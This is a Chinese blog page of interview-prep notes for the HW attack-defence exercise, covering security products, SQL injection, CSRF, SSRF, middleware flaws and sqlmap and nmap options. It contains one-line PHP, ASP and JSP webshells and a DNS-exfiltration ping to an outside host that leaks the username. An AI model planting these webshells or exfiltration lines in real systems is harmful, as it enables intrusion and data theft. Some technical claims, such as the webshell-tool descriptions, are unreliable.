<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="keywords" content="Hexo Theme Keep">
    <meta name="description" content="Hexo Theme Keep">
    <meta name="author" content="P1taya">
    
    <title>
        
            HW prepare |
        
        P1taya
    </title>
    
<link rel="stylesheet" href="/css/style.css">

    
        <link rel="shortcut icon" href="/images/p1taya.jpg">
    
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@4.1.1/source/font/css/fontawesome.min.css">
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@4.1.1/source/font/css/regular.min.css">
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@4.1.1/source/font/css/solid.min.css">
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@4.1.1/source/font/css/brands.min.css">
    
        
            
                
<link rel="stylesheet" href="/css/demo1.css">

            
        
    
    <script class="keep-theme-configurations">
    const KEEP = window.KEEP || {}
    KEEP.hexo_config = {"hostname":"example.com","root":"/","language":"zh-CN","path":"search.json"}
    KEEP.theme_config = {"base_info":{"primary_color":"#0066cc","title":"P1taya","author":"P1taya","avatar":"/images/p1taya.jpg","logo":"/images/p1taya.jpg","favicon":"/images/p1taya.jpg"},"menu":{"home":"/ || fa-solid fa-home","archives":"/archives || fa-solid fa-box-archive","categories":"/categories || fa-solid fa-layer-group","links":"/links || fa-solid fa-link","about":"/about || fa-solid fa-user-graduate","photos":"/photos || fa-solid fa-image"},"first_screen":{"enable":true,"background_img":"/images/bg.svg","description":"人后的苦尚且还能克服 || 人前的尊严却无比脆弱","hitokoto":false},"social_contact":{"enable":false,"links":{"github":null,"weixin":null,"qq":null,"weibo":null,"zhihu":null,"twitter":null,"x":null,"facebook":null,"email":null}},"scroll":{"progress_bar":false,"percent":false,"hide_header":true},"home":{"announcement":null,"category":true,"tag":true,"post_datetime":"created || fa-solid fa-home","post_datetime_format":"YYYY-MM-DD HH:mm:ss"},"post":{"author_badge":{"enable":true,"level_badge":true,"custom_badge":["One","Two","Three"]},"word_count":{"wordcount":true,"min2read":true},"datetime_format":"YYYY-MM-DD HH:mm:ss","copyright_info":true,"share":false,"reward":{"enable":false,"img_link":null,"text":null}},"code_block":{"tools":{"enable":true,"style":"mac"},"highlight_theme":"obsidian"},"toc":{"enable":true,"number":false,"expand_all":true,"init_open":true,"layout":"right"},"website_count":{"busuanzi_count":{"enable":true,"site_uv":true,"site_pv":true,"page_pv":true}},"local_search":{"enable":true,"preload":false},"comment":{"enable":false,"use":"valine","valine":{"appid":null,"appkey":null,"server_urls":null,"placeholder":null},"gitalk":{"github_id":null,"github_admins":null,"repository":null,"client_id":null,"client_secret":null,"proxy":null},"twikoo":{"env_id":null,"region":null,"version":"1.6.21"},"waline":{"server_url":null,"reaction":false,"version":2},"giscus":{"repo":null,"repo_id":null,"category":"Announcements","category_id":null,"reactions_enabled":false},"artalk":{"server":null},"disqus":{"shortname":null}},"rss":{"enable":false},"lazyload":{"enable":true},"cdn":{"enable":true,"provider":"jsdelivr"},"pjax":{"enable":false},"footer":{"since":2022,"word_count":true},"inject":{"enable":true,"css":["/css/demo1.css"],"js":[null]},"root":"","source_data":{"links":[{"name":"小黄dog","link":"https://wuster.store/","avatar":"https://wuster.store/images/favicon.ico"},{"name":"🐶狗and猫","link":"https://fushuling.com/","avatar":"https://fushuling-1309926051.cos.ap-shanghai.myqcloud.com/avatar.jpg"}]},"version":"4.1.1"}
    KEEP.language_ago = {"second":"%s 秒前","minute":"%s 分钟前","hour":"%s 小时前","day":"%s 天前","week":"%s 周前","month":"%s 个月前","year":"%s 年前"}
    KEEP.language_code_block = {"copy":"复制代码","copied":"已复制","fold":"折叠代码块","folded":"已折叠"}
    KEEP.language_copy_copyright = {"copy":"复制版权信息","copied":"已复制","title":"原文标题","author":"原文作者","link":"原文链接"}
  </script>
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
<div class="progress-bar-container">
    

    
</div>



<main class="page-container border-box">
    <!-- home first screen  -->
    

    <!-- page content -->
    <div class="page-main-content border-box">
        <div class="page-main-content-top">
            
<header class="header-wrapper">

    <div class="border-box header-content">
        <div class="left border-box">
            
                <a class="logo-image border-box" href="/">
                    <img src="/images/p1taya.jpg">
                </a>
            
            <a class="site-name border-box" href="/">
               P1taya
            </a>
        </div>

        <div class="right border-box">
            <div class="pc">
                <ul class="menu-list">
                    
                        
                        <li class="menu-item">
                            <a class=""
                               href="/"
                            >
                                
                                    <i class="menu-icon fa-solid fa-home"></i>
                                
                                首页
                            </a>
                        </li>
                    
                        
                        <li class="menu-item">
                            <a class=""
                               href="/archives"
                            >
                                
                                    <i class="menu-icon fa-solid fa-box-archive"></i>
                                
                                归档
                            </a>
                        </li>
                    
                        
                        <li class="menu-item">
                            <a class=""
                               href="/categories"
                            >
                                
                                    <i class="menu-icon fa-solid fa-layer-group"></i>
                                
                                分类
                            </a>
                        </li>
                    
                        
                        <li class="menu-item">
                            <a class=""
                               href="/links"
                            >
                                
                                    <i class="menu-icon fa-solid fa-link"></i>
                                
                                友链
                            </a>
                        </li>
                    
                        
                        <li class="menu-item">
                            <a class=""
                               href="/about"
                            >
                                
                                    <i class="menu-icon fa-solid fa-user-graduate"></i>
                                
                                关于
                            </a>
                        </li>
                    
                        
                        <li class="menu-item">
                            <a class=""
                               href="/photos"
                            >
                                
                                    <i class="menu-icon fa-solid fa-image"></i>
                                
                                相册
                            </a>
                        </li>
                    
                    
                        <li class="menu-item search search-popup-trigger">
                            <i class="fas search fa-search"></i>
                        </li>
                    
                </ul>
            </div>
            <div class="mobile">
                
                    <div class="icon-item search search-popup-trigger"><i class="fas fa-search"></i></div>
                
                <div class="icon-item menu-bar">
                    <div class="menu-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <div class="header-drawer">
        <ul class="drawer-menu-list">
            
                
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/"
                    >首页</a>
                </li>
            
                
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/archives"
                    >归档</a>
                </li>
            
                
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/categories"
                    >分类</a>
                </li>
            
                
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/links"
                    >友链</a>
                </li>
            
                
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/about"
                    >关于</a>
                </li>
            
                
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/photos"
                    >相册</a>
                </li>
            
        </ul>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="page-main-content-middle border-box">

            <div class="main-content border-box">
                

                    
<div class="fade-in-down-animation">
    <div class="post-page-container border-box">
        <div class="post-content-container border-box">
            

            <div class="post-content-bottom border-box">
                
                    <div class="post-title">
                        HW prepare
                    </div>
                

                
                    <div class="post-header border-box">
                        
                            <div class="avatar-box border-box">
                                <img src="/images/p1taya.jpg">
                            </div>
                        
                        <div class="info-box">
                            <div class="author border-box">
                                <span class="name">P1taya</span>
                                
                                    <span class="author-badge">Lv4</span>
                                
                            </div>
                            <div class="meta-info border-box">
                                

<div class="post-meta-info-container border-box post">
    <div class="post-meta-info border-box">
        

        
            <span class="meta-info-item post-create-date">
                <i class="icon fa-solid fa-calendar-plus"></i>&nbsp;
                <span class="datetime">2023-04-12 21:20:31</span>
            </span>

            <span class="meta-info-item post-update-date">
                <i class="icon fa-solid fa-file-pen"></i>&nbsp;
                <span class="datetime" data-updated="Wed Apr 17 2024 16:43:00 GMT+0800">2024-04-17 16:43:00</span>
            </span>
        

        
            <span class="meta-info-item post-category border-box"><i class="icon fas fa-folder"></i>&nbsp;
                <ul class="post-category-ul">
                    
                            <li class="category-item"><a href="/categories/%E5%AD%A6%E4%B9%A0/">学习</a></li>
                        
                    
                </ul>
            </span>
        

        

        
        
            <span class="meta-info-item post-wordcount">
                <i class="icon fas fa-file-word"></i>&nbsp;<span>10.7k 字</span>
            </span>
        
        
            <span class="meta-info-item post-min2read">
                <i class="icon fas fa-clock"></i>&nbsp;<span>38 分钟</span>
            </span>
        
        
            <span class="meta-info-item post-pv">
                <i class="icon fas fa-eye"></i>&nbsp;<span id="busuanzi_value_page_pv"></span>
            </span>
        
    </div>

    
</div>

                            </div>
                        </div>
                    </div>
                

                <div class="post-content keep-markdown-body">
                    

                    <h1 id="HW-prepare"><a href="#HW-prepare" class="headerlink" title="HW prepare"></a>HW prepare</h1><h3 id="对hw的理解"><a href="#对hw的理解" class="headerlink" title="对hw的理解"></a>对hw的理解</h3><p>我个人觉得护网行动是国家重视网络安全的一种体现，目的是发现企业政府安全问题并解决，提供安全能力</p>
<p>hw分为蓝队防守方和红队攻击方</p>
<h3 id="hw防守人员组成"><a href="#hw防守人员组成" class="headerlink" title="hw防守人员组成"></a>hw防守人员组成</h3><p>监控组：监控组主要就是对WAF、IPS等安全设备进行7*24小时监控、派发、跟踪、反馈安全威胁</p>
<p>研判组：研判组主要是技术支撑，对于监控组发现的攻击行为进行技术研判</p>
<p>网络处置组：网络处置组主要职责就是发现攻击时在防火墙上对攻击方进行IP封锁，溯源等等</p>
<p>应用处置组：应用处置组主要就是对发现的攻击和漏洞进行风险处置、安全加固</p>
<h3 id="安全产品了解哪些"><a href="#安全产品了解哪些" class="headerlink" title="安全产品了解哪些"></a>安全产品了解哪些</h3><ul>
<li>防火墙一般不属于区域的边界，如数据中心中核心区域和业务区域的边界防火墙、园区网络边界防火墙等，主要做保证边界安全</li>
<li>抗D也叫抗DDOS设备即流量清洗设备，一般部署与网络最外侧，防止大规模僵尸网络入侵，内部有一套完整的机制可以区分哪些流量是用户正常流量和僵尸网络流量，可以保障数据中心可以提供完整的数据中心服务；</li>
<li>负载均衡设备分为全局负载均衡（GLB）和链路负载均衡（LLB）以及服务器负载均衡（SLB）。GLB可以保障用户可以访问就近的数据中心提供的服务资源，LLB可以保障流量的出栈负载均衡和入栈负载均衡。SLB可以保障服务器对外服务的时候负载更平均、可靠；</li>
<li>WAF即<a class="link"   target="_blank" rel="noopener" href="https://cloud.tencent.com/product/waf?from=20065&from_column=20065" >web应用防火墙<i class="fas fa-external-link-alt"></i></a>，可以防止网站挂马保障网页安全，部署在WEB服务器区域；</li>
<li>数据库审计设备是把对数据库所有的操作记录下来，方便后期溯源审计和责任明确，部署在运维管理区域或者数据库审计区域均可。</li>
<li>漏扫即<a class="link"   target="_blank" rel="noopener" href="https://cloud.tencent.com/product/vds?from=20065&from_column=20065" >漏洞扫描<i class="fas fa-external-link-alt"></i></a>就是给系统做体检，可以扫描出操作系统漏洞、数据库漏洞、WEB漏洞，方便管理员对暴露出的漏洞情况进行安全加固。一般部署在安全检测区域。</li>
<li>网页防篡改一般和WAF配合使用，保护web网页不被黑客篡改，如果被篡改了，那结果仍然可以显示篡改前的正常页面，在政府行业用的最多。一般是软件直接安装在WEB服务器上。</li>
<li>上网行为管理设备说白了是可以记录员工的上网行为，包括浏览网页的地址、检索内容、聊天记录等，一般旁挂于核心交换机。</li>
<li>堡垒机即运维审计设备，所有涉及到登录设备（如服务器、存储、交换机、防火墙等ICT产品）的操作都要先登录到堡垒机统一登录入口。同时所有的操作都会被审计下来，方便后期溯源取证。</li>
</ul>
<h3 id=""><a href="#" class="headerlink" title=""></a></h3><h3 id="pdf解析有没有可能存在xxe"><a href="#pdf解析有没有可能存在xxe" class="headerlink" title="pdf解析有没有可能存在xxe"></a>pdf解析有没有可能存在xxe</h3><p>是的，PDF 解析器可能存在 XXE（XML 外部实体注入）漏洞。这是因为 PDF 格式支持内嵌 XML 数据，并且一些 PDF 解析器可能会对这些数据进行处理，其中可能包含 XML 实体。</p>
<h3 id="http协议里面method和data"><a href="#http协议里面method和data" class="headerlink" title="http协议里面method和data"></a>http协议里面method和data</h3><p>方法	描述	是否包含主体<br>GET	从服务器获取一份文档	否<br>HEAD	只从服务器获取文档的首部	否<br>POST	向服务器发送带要处理的数据	是<br>PUT	将请求的主体部分存储在服务器上	是<br>TRACE	对可能经过代理服务器传送到服务器上去的报文进行追踪	否<br>OPTIONS	决定可以在胀务器上执行哪些方法	否<br>DELETE	从服务器上删除一份文档	否</p>
<h3 id="威胁情报告警如何判断"><a href="#威胁情报告警如何判断" class="headerlink" title="威胁情报告警如何判断"></a>威胁情报告警如何判断</h3><h3 id="网络攻击类的告警要怎么判断"><a href="#网络攻击类的告警要怎么判断" class="headerlink" title="网络攻击类的告警要怎么判断"></a>网络攻击类的告警要怎么判断</h3><h3 id="sql注入的修复方式"><a href="#sql注入的修复方式" class="headerlink" title="sql注入的修复方式"></a>sql注入的修复方式</h3><ul>
<li>SQL语句预编译</li>
<li>针对SQL输入内容进行限制、过滤 &#x2F;&#x2F;目前使用WAF对这一块进行处理</li>
<li>针对提交的关键数据进行转义 ，比如\select</li>
<li>关闭错误信息输出 ，因为有些错误返回信息，会返回物理路径、数据库版本信息等</li>
<li>数据库权限严格控制 ，不同级别的用户，只能进行相应级别权限的操作</li>
<li>敏感信息严格加密处理</li>
</ul>
<h3 id="网络攻击的方向来自哪三个方向"><a href="#网络攻击的方向来自哪三个方向" class="headerlink" title="网络攻击的方向来自哪三个方向"></a>网络攻击的方向来自哪三个方向</h3><h3 id="如何判断攻击是不是误报"><a href="#如何判断攻击是不是误报" class="headerlink" title="如何判断攻击是不是误报"></a>如何判断攻击是不是误报</h3><h3 id="DNS外带存在哪些漏洞"><a href="#DNS外带存在哪些漏洞" class="headerlink" title="DNS外带存在哪些漏洞"></a>DNS外带存在哪些漏洞</h3><ul>
<li><p>sql盲注</p>
</li>
<li><p>XSS</p>
</li>
<li><p>命令执行</p>
</li>
<li><p>windows可以查询主机用户名等</p>
<p>ping %USERNAME%.XXX.CEYE.IO</p>
</li>
<li><p>xxe</p>
</li>
<li><p>ssrf</p>
</li>
</ul>
<h3 id="什么是攻防演练"><a href="#什么是攻防演练" class="headerlink" title="什么是攻防演练"></a>什么是攻防演练</h3><p>网络安全实战攻防演练是以获取指定目标系统（标靶系统）的管理权限为目标的攻防演练，由攻防领域经验丰富的红队专家组成攻击队，在保障业务系统稳定运行的前提下，采用“不限攻击路径，不限制攻击手段”的贴合实战方式，而形成的“有组织”的网络攻击行动。攻防演练通常是在真实网络环境下对参演单位目标系统进行全程可控、可审计的实战攻击，拟通过演练检验参演单位的安全防护和应急处置能力，提高网络安全的综合防控能力。</p>
<h3 id="怎么判断socket代理"><a href="#怎么判断socket代理" class="headerlink" title="怎么判断socket代理"></a>怎么判断socket代理</h3><blockquote>
<p>通过 Websocket 的 bufferedAmount 来探测用户是否采用来代理</p>
<ol>
<li>Client 通过 Websocket 与 Server 建立连接</li>
<li>Server 监听到 connect 事件后，将本次 TCP 的 window size 设置为 0，这也就意味着 Client 无法继续将数据包传给 server</li>
<li>Client 使用 websocket.send()持续发送几个包</li>
<li>在 Client 上观察 websocket.bufferedAmount 值，如果过了一会，这个值一直在增大，说明无代理，否则存在代理<br>为啥可以通过这个值来判断呢？这是因为代理工具一般不会转发 TCP 的设置，也就是说，开启了代理的 Client 发出的包会被代理给吃掉</li>
</ol>
</blockquote>
<h3 id="一句话木马"><a href="#一句话木马" class="headerlink" title="一句话木马"></a>一句话木马</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php @eval($_POST[1]);?&gt;    php</span><br><span class="line">&lt;%eval request(&quot;chopper&quot;)%&gt;   asp</span><br><span class="line"> &lt;%Process process = Runtime.getRuntime().exec(request.getParameter(&quot;cmd&quot;));%&gt;  jsp</span><br><span class="line"></span><br></pre></td></tr></table></figure>



<h3 id="社工手段有哪些"><a href="#社工手段有哪些" class="headerlink" title="社工手段有哪些"></a>社工手段有哪些</h3><ul>
<li>邮件钓鱼 </li>
<li>伪装成熟人</li>
</ul>
<h3 id="fastjson"><a href="#fastjson" class="headerlink" title="fastjson"></a>fastjson</h3><h3 id="客服有映射到外网的服务器被打进来了，如何溯源"><a href="#客服有映射到外网的服务器被打进来了，如何溯源" class="headerlink" title="客服有映射到外网的服务器被打进来了，如何溯源"></a>客服有映射到外网的服务器被打进来了，如何溯源</h3><h3 id="常见的中间件漏洞"><a href="#常见的中间件漏洞" class="headerlink" title="常见的中间件漏洞"></a>常见的中间件漏洞</h3><p>IIS</p>
<ul>
<li>解析漏洞</li>
<li>put任意文件写入</li>
<li>段文件漏洞</li>
</ul>
<p>apache</p>
<ul>
<li>未知扩展名解析漏洞</li>
<li>addhandler导致的解析漏洞</li>
<li>换行解析漏洞</li>
</ul>
<p>nginx</p>
<ul>
<li>解析漏洞</li>
<li>空字节任意代码执行</li>
<li>文件名逻辑漏洞‘</li>
<li>配置错误导致的安全问题</li>
</ul>
<p>tomcat</p>
<ul>
<li>任意文件写入</li>
<li>远程代码执行</li>
<li>弱口令+后台getshell</li>
</ul>
<p>jboss</p>
<ul>
<li>反序列化漏洞</li>
<li>弱口令</li>
</ul>
<h3 id="ngsoc冷热数据"><a href="#ngsoc冷热数据" class="headerlink" title="ngsoc冷热数据"></a>ngsoc冷热数据</h3><p>奇安信网神态势感知与安全运营平台（简称NGSOC）</p>
<h3 id="代理工具类告警，流量特征"><a href="#代理工具类告警，流量特征" class="headerlink" title="代理工具类告警，流量特征"></a>代理工具类告警，流量特征</h3><h3 id="你感觉windows漏洞多还是linux漏洞多"><a href="#你感觉windows漏洞多还是linux漏洞多" class="headerlink" title="你感觉windows漏洞多还是linux漏洞多"></a>你感觉windows漏洞多还是linux漏洞多</h3><p>个人觉得linux漏洞多，debian linux漏洞最多</p>
<h3 id="永恒之蓝"><a href="#永恒之蓝" class="headerlink" title="永恒之蓝"></a>永恒之蓝</h3><p>2017年</p>
<p>用Windows系统的SMB协议漏洞来获取系统的最高权限 139，445端口</p>
<h3 id="sql注入写文件"><a href="#sql注入写文件" class="headerlink" title="sql注入写文件"></a>sql注入写文件</h3><p>load_file()读文件 into outfile &#x2F; into dumpfile写文件</p>
<h3 id="正向代理反向代理"><a href="#正向代理反向代理" class="headerlink" title="正向代理反向代理"></a>正向代理反向代理</h3><p>正向代理代理的对象是客户端，反向代理代理的对象是服务端。</p>
<h3 id="延时注入在流量告警上如何判断的"><a href="#延时注入在流量告警上如何判断的" class="headerlink" title="延时注入在流量告警上如何判断的"></a>延时注入在流量告警上如何判断的</h3><h3 id="宽字节"><a href="#宽字节" class="headerlink" title="宽字节"></a>宽字节</h3><p>一个字符数大小为两个字节的为宽字节，比如GBK编码，我们汉字通常使用的就是GBK编码，也就是说一次性会读取两个字节。</p>
<p>当我们的mysql使用GBK编码后，同时两个字符的前一个字符ASCII码大于128时，会将两个字符认成一个汉字</p>
<h3 id="流量代理工具有哪些"><a href="#流量代理工具有哪些" class="headerlink" title="流量代理工具有哪些"></a>流量代理工具有哪些</h3><p>vpn，Shadowsocks，Trojan，WireGuard</p>
<h3 id="冰蝎与哥斯拉的连接特征"><a href="#冰蝎与哥斯拉的连接特征" class="headerlink" title="冰蝎与哥斯拉的连接特征"></a>冰蝎与哥斯拉的连接特征</h3><p>冰蝎和哥斯拉都是利用远程管理工具（如Apache Struts漏洞）进行攻击，然后利用远程桌面协议（RDP）或SSH进行横向移动。</p>
<p>都能够进行远程控制</p>
<p>都可以进行数据窃取</p>
<p>使用加密通信</p>
<h3 id="怎么判断逻辑漏洞是否攻击成功"><a href="#怎么判断逻辑漏洞是否攻击成功" class="headerlink" title="怎么判断逻辑漏洞是否攻击成功"></a>怎么判断逻辑漏洞是否攻击成功</h3><ol>
<li>行为变化：逻辑漏洞攻击成功后，攻击者可能会进行一些行为变化，比如访问一些不应该被访问的资源，或者执行一些不应该被执行的操作。</li>
<li>数据变化：逻辑漏洞攻击成功后，攻击者可能会修改、删除或者新增某些数据。</li>
<li>系统响应：逻辑漏洞攻击成功后，系统可能会出现异常响应，比如返回异常的HTTP状态码或者错误信息。</li>
<li>安全日志：逻辑漏洞攻击成功后，可能会在系统的安全日志中留下痕迹，比如异常访问记录、错误日志等。</li>
</ol>
<h3 id="sql注入修复方式"><a href="#sql注入修复方式" class="headerlink" title="sql注入修复方式"></a>sql注入修复方式</h3><ul>
<li>SQL语句预编译</li>
<li>针对SQL输入内容进行限制、过滤 &#x2F;&#x2F;目前使用WAF对这一块进行处理</li>
<li>针对提交的关键数据进行转义 ，比如\select</li>
<li>关闭错误信息输出 ，因为有些错误返回信息，会返回物理路径、数据库版本信息等</li>
<li>数据库权限严格控制 ，不同级别的用户，只能进行相应级别权限的操作</li>
<li>敏感信息严格加密处理</li>
</ul>
<h3 id="天眼与ngsoc区别"><a href="#天眼与ngsoc区别" class="headerlink" title="天眼与ngsoc区别"></a>天眼与ngsoc区别</h3><p>NGSOC主要应用于较为复杂、高风险的网络环境，如金融机构、能源公司等，其主要优点是可以集成多种不同的安全监测工具，实现信息的智能化分析和响应；而天眼则更加注重对企业内部网络资产的保护，具备网络漏洞检测和入侵攻击检测等多种功能。</p>
<h3 id="文件上传漏洞如何防御"><a href="#文件上传漏洞如何防御" class="headerlink" title="文件上传漏洞如何防御"></a>文件上传漏洞如何防御</h3><ul>
<li><p>检查文件上传路径 ( 避免 0x00 截断、 IIS6.0 文件夹解析漏洞、目录遍历 )</p>
</li>
<li><p>文件扩展名检测 ( 避免服务器以非图片的文件格式解析文件 ),验证文件扩展名 通常有两种方式 : 黑名单和白名单 .</p>
</li>
<li><p>文件 MIME验证 ( 比如 GIF 图片 MIME为 image&#x2F;gif,CSS 文件的 MIME为 text&#x2F;css 等 ) 3. 文件内容检测 ( 避免图片中插入 webshell)</p>
</li>
<li><p>图片二次渲染 ( 最变态的上传漏洞防御方式 , 基本上完全避免了文件上传漏洞 )</p>
</li>
<li><p>文件重命名 ( 如随机字符串或时间戳等方式 , 防止攻击者得到 webshell 的路径 )</p>
</li>
<li><p>隐藏上传路径</p>
</li>
</ul>
<h3 id="xff"><a href="#xff" class="headerlink" title="xff"></a>xff</h3><p>x-forwarded-for 表了HTTP的请求端真实的IP</p>
<p>可以进行sql注入</p>
<h3 id="sql注入写文件前提"><a href="#sql注入写文件前提" class="headerlink" title="sql注入写文件前提"></a>sql注入写文件前提</h3><ul>
<li>对web目录具有读写权限</li>
<li>知道文件绝对路径</li>
<li>能够使用联合查询（sql注入时）</li>
<li>secure_file_priv，File_priv</li>
</ul>
<h3 id="sqlmap一些参数"><a href="#sqlmap一些参数" class="headerlink" title="sqlmap一些参数"></a>sqlmap一些参数</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line">-h                  输出参数说明</span><br><span class="line">-hh                 输出详细的参数说明</span><br><span class="line">-v                  输出级别（0~6，默认1）</span><br><span class="line">-u url              指定url</span><br><span class="line">--data=DATA         该参数指定的数据会被作为POST数据提交</span><br><span class="line">-r file.txt         常用于POST注入或表单提交时注入</span><br><span class="line">-p / --skip         指定/跳过测试参数</span><br><span class="line">--cookie            设置cookie</span><br><span class="line">--force-ssl         强制使用SSL</span><br><span class="line">--threads           指定线程并发数</span><br><span class="line">--prefix            指定前缀</span><br><span class="line">--suffix            指定后缀</span><br><span class="line">--level             检测级别（1~5，默认1）</span><br><span class="line">--risk              风险等级（1~4，默认1）</span><br><span class="line">--all               列举所有可访问的数据（不推荐）</span><br><span class="line">--banner            列举数据库系统的信息等</span><br><span class="line">--current-user      输出当前用户</span><br><span class="line">--current-db        输出当前所在数据库</span><br><span class="line">--hostname          输出服务器主机名</span><br><span class="line">--is-dba            检测当前用户是否为管理员</span><br><span class="line">--users             输出数据库系统的所有用户</span><br><span class="line">--dbs               输出数据库系统的所有数据库</span><br><span class="line">-D DB               指定数据库</span><br><span class="line">--tables            在-D情况下输出库中所有表名</span><br><span class="line">-T table            在-D情况下指定数据表</span><br><span class="line">--columns           在-D -T情况下输出表中所有列名</span><br><span class="line">-C column           在-D -T情况下输出某列数据的值</span><br><span class="line">--dump              拉取数据存放到本地</span><br><span class="line">--dump-all          拉取所有可访问数据存放到本地</span><br><span class="line">--count             输出数据条目数量</span><br><span class="line">--search            搜索数据库名、表明、列名，需要与-D -T或-C 联用</span><br><span class="line">--sql-query         执行任意的SQL语句</span><br><span class="line">--sql-shell         使用交互式SQL语句执行环境</span><br><span class="line">--flie-read         读取文件</span><br><span class="line">--file-write        上传文件（指定本地路径）</span><br><span class="line">--file-dest         上传文件（指定目标机器路径）</span><br><span class="line">--os-cmd            执行任意系统命令</span><br><span class="line">--os-shell          使用交互式shell执行命令</span><br><span class="line">--batch             所有要求输入都选取默认值</span><br><span class="line">--wizard            初学者向导</span><br></pre></td></tr></table></figure>





<h3 id="csrf"><a href="#csrf" class="headerlink" title="csrf"></a>csrf</h3><p>攻击者可以盗用你的登陆信息，以你的身份模拟发送各种请求对服务器来说这个请求是完全合法的，但是却完成了攻击者所期望的一个操作</p>
<p>CSRF 攻击的三个条件 :</p>
<pre><code>   1 . 用户已经登录了站点 A，并在本地记录了 cookie

   2 . 在用户没有登出站点 A 的情况下（也就是 cookie 生效的情况下），访问了恶意攻击者提供的引诱危险站点 B (B 站点要求访问站点A)。

   3 . 站点 A 没有做任何 CSRF 防御
</code></pre>
<p><strong>漏洞检测</strong></p>
<p>检测CSRF漏洞最简单的方法就是抓取一个正常请求的数据包，去掉Referer字段后再重新提交，如果该提交还有效，那么基本上可以确定存在CSRF漏洞。</p>
<p><strong>防御</strong></p>
<ol>
<li>验证 HTTP Referer 字段；</li>
<li>在请求地址中添加 token 并验证；</li>
<li>在 HTTP 头中自定义属性并验证；</li>
<li>Chrome 浏览器端启用 SameSite cookie</li>
</ol>
<h3 id="ssrf"><a href="#ssrf" class="headerlink" title="ssrf"></a>ssrf</h3><p>服务端请求伪造(Server-Side Request Forgery),指的是攻击者在未能取得服务器所有权限时，利用服务器漏洞以服务器的身份发送一条构造好的请求给服务器所在内网。SSRF攻击通常针对外部网络无法直接访问的内部系统。</p>
<p>防御</p>
<p>1、过滤返回的信息，如果web应用是去获取某一种类型的文件。那么在把返回结果展示给用户之前先验证返回的信息是否符合标准。</p>
<p>2、统一错误信息，避免用户可以根据错误信息来判断远程服务器的端口状态。</p>
<p>3、限制请求的端口，比如80,443,8080,8090。</p>
<p>4、禁止不常用的协议，仅仅允许http和https请求。可以防止类似于file:&#x2F;&#x2F;&#x2F;,gopher:&#x2F;&#x2F;,ftp:&#x2F;&#x2F;等引起的问题。</p>
<p>5、使用DNS缓存或者Host白名单的方式。</p>
<h3 id="水坑漏洞"><a href="#水坑漏洞" class="headerlink" title="水坑漏洞"></a>水坑漏洞</h3><p>水坑攻击（Watering Hole Attack）”是一种网络攻击方式。攻击者通过在特定网页中植入恶意代码，来攻击访问该网页的用户</p>
<p>防御</p>
<p>（1）    及时更新操作系统及应用程序，修复已知漏洞；</p>
<p>（2）    安装可以信赖的安全软件，及时发现网页浏览过程中的异常行为；</p>
<p>（3）    监测所有网络传输流量，及时发现异常通信；</p>
<h3 id="鱼叉攻击"><a href="#鱼叉攻击" class="headerlink" title="鱼叉攻击"></a>鱼叉攻击</h3><p>鱼叉攻击，肯定是有看到了鱼再叉，也就是有针对性的攻击，目标明确，比如公司或团体，给这些特定团体发送包含木马的邮件，这种邮件要让受害者打开，就需要一个欺骗和迷惑的标题。这个题目和内容的构造就考验红方的想象力了。比如打补丁的通知邮件，放假通知安排，投诉举报，简历投递或者来点公司的劲爆信息引爆吃瓜群众。员工点了附件之后，就中了木马，黑客在远端就可以远程控制这个电脑了。</p>
<h3 id="tomcat可以执行的后缀名"><a href="#tomcat可以执行的后缀名" class="headerlink" title="tomcat可以执行的后缀名"></a>tomcat可以执行的后缀名</h3><p>jsp html htm js css xml gif jpg png pdf doc xls</p>
<h3 id="ssrf有哪些协议"><a href="#ssrf有哪些协议" class="headerlink" title="ssrf有哪些协议"></a>ssrf有哪些协议</h3><p>http https ftp smtp dns file </p>
<h3 id="mysql数据库系统执行函数"><a href="#mysql数据库系统执行函数" class="headerlink" title="mysql数据库系统执行函数"></a>mysql数据库系统执行函数</h3><h3 id="nmap参数"><a href="#nmap参数" class="headerlink" title="nmap参数"></a>nmap参数</h3><ul>
<li>-sS 半开扫描(TCP SYN扫描)，执行速度快，不容易被注意到，可以避免被记入目标系统的日志，需要root权限。它常常被称为半开放扫描， 因为它不打开一个完全的TCP连接。它发送一个SYN报文， 就像您真的要打开一个连接，然后等待响应。</li>
<li>-sT 当SYN扫描不能用时，TCP Connect()扫描就是默认的TCP扫描。会在⽬标主机的⽇志中记录⼤批连接请求和错误信息，但是由于是tcp connect()扫描，容易被记录。当SYN扫描可用时，它通常是更好的选择</li>
